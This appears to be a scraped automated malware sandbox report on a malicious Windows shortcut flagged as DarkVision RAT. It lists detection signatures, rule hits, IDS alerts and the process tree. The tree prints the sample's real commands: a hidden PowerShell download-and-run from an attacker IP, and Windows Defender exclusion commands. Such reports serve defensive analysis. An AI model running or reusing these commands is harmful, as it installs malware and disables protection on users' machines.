Edit tour
Windows
Analysis Report
LPO-0048532025.lnk
Overview
General Information
Detection
DarkVision Rat
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to evade debugger and weak emulator (self modifying code)
Uses dynamic DNS services
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 7672 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -command " & { Invoke -WebReques t -Uri htt p://87.120 .113.91/im age.exe -O utFile C:\ Users\user \AppData\L ocal\Temp\ file.exe; Start-Proc ess 'C:\Us ers\user\A ppData\Loc al\Temp\fi le.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - file.exe (PID: 5980 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\file.e xe" MD5: A3A87410C13CC37B48A9D63D84798A26) - cmd.exe (PID: 6912 cmdline:
cmd.exe /c powershel l.exe Add- MpPreferen ce -Exclus ionPath 'C :\ProgramD ata\explor ers' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1740 cmdline:
powershell .exe Add-M pPreferenc e -Exclusi onPath 'C: \ProgramDa ta\explore rs' MD5: 04029E121A0CFA5991749937DD22A1D9) - explorers.exe (PID: 1224 cmdline:
"C:\Progra mData\expl orers\expl orers.exe" {8ACDE7F8 -56B2-461C -B2DA-0AAA DBA16242} MD5: A3A87410C13CC37B48A9D63D84798A26) - cmd.exe (PID: 2220 cmdline:
cmd.exe /c powershel l.exe Add- MpPreferen ce -Exclus ionPath 'C :\ProgramD ata\explor ers' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2952 cmdline:
powershell .exe Add-M pPreferenc e -Exclusi onPath 'C: \ProgramDa ta\explore rs' MD5: 04029E121A0CFA5991749937DD22A1D9) - explorer.exe (PID: 3996 cmdline:
"C:\Window s\explorer .exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
- cmd.exe (PID: 2176 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Prog ramData\{F 507C7EB-04 60-419E-BE 06-0FA6DFA 315DF}\{C0 EDD55B-261 0-4BC4-A06 C-A014DB07 F034}.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7624 cmdline:
cmd /c sta rt "" "C:\ ProgramDat a\explorer s\explorer s.exe" {8C 297CC8-E37 4-4152-AC2 2-8BDCBA90 B505} MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - explorers.exe (PID: 2092 cmdline:
"C:\Progra mData\expl orers\expl orers.exe" {8C297CC8 -E374-4152 -AC22-8BDC BA90B505} MD5: A3A87410C13CC37B48A9D63D84798A26)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
Click to see the 27 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Click to see the 16 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-27T14:53:56.060847+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49762 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:53:59.159333+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49768 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:00.976299+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49774 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:02.853813+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49779 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:04.730431+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49784 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:06.542515+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49789 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:49.969424+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49880 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:52.973074+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49888 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:54.846016+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49893 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:57.074910+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49898 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:58.886024+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49903 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:00.652070+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49909 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:35.769975+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49986 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:39.258495+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49992 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:41.226888+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49993 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:43.158775+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49994 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:45.539195+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49995 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:47.457956+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49996 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:23.103361+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49997 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:26.261211+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49998 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:28.071210+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 49999 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:29.822188+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50000 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:31.830188+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50001 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:33.654581+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50002 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:08.976104+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50003 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:12.131748+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50004 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:13.898040+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50005 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:15.663782+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50006 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:17.483886+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50007 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:19.321950+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.10 | 50008 | 87.121.86.214 | 3441 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-27T14:53:58.295619+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.10 | 49762 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:54:52.127117+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.10 | 49880 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:55:38.253045+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.10 | 49986 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:56:25.391295+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.10 | 49997 | 87.121.86.214 | 3441 | TCP |
2024-12-27T14:57:11.265358+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.10 | 50003 | 87.121.86.214 | 3441 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-27T14:53:40.215976+0100 | 1810003 | 2 | Potentially Bad Traffic | 87.120.113.91 | 80 | 192.168.2.10 | 49721 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-27T14:53:40.215931+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.10 | 49721 | 87.120.113.91 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |